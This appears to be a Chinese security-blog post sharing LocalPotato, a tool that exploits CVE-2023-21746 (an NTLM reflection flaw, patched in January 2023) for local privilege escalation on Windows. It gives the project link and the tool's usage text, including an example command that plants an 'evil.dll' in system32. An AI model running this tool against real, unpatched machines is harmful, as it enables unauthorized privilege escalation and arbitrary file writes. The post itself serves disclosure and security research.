Windows本地提权工具 | 使用新的Potato技术

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/decoder-it/LocalPotato

本地马铃薯

另一个使用新Potato技术的本地 Windows 权限升级 ;)

LocalPotato 攻击是一种针对本地身份验证的 NTLM 反射攻击。这种攻击允许任意文件读/写和特权提升。

注意:此漏洞已由 Microsoft 在 2023 年 1 月补丁星期二修复,编号为CVE-2023-21746。如果你在打补丁的机器上运行这个漏洞,它就不会工作。

更多技术细节,请访问 --> https://www.localpotato.com/localpotato_html/LocalPotato.html

用法

LocalPotato (aka CVE-2023-21746)
         by splinter_code & decoder_it


Mandatory Args:
-i Source file to copy
-o Output file - do not specify the drive letter
Example: localpotato -i c:\hacker\evil.dll -o windows\system32\evil.dll

Optional Args:
-c CLSID (Default {854A20FB-2D44-457D-992F-EF13785D2B51})
-p COM server port (Default 10271)

 

演示

 

ad1a1b7183183157

 

作者:

标签:工具分享, 主机安全, windows漏洞, 权限提升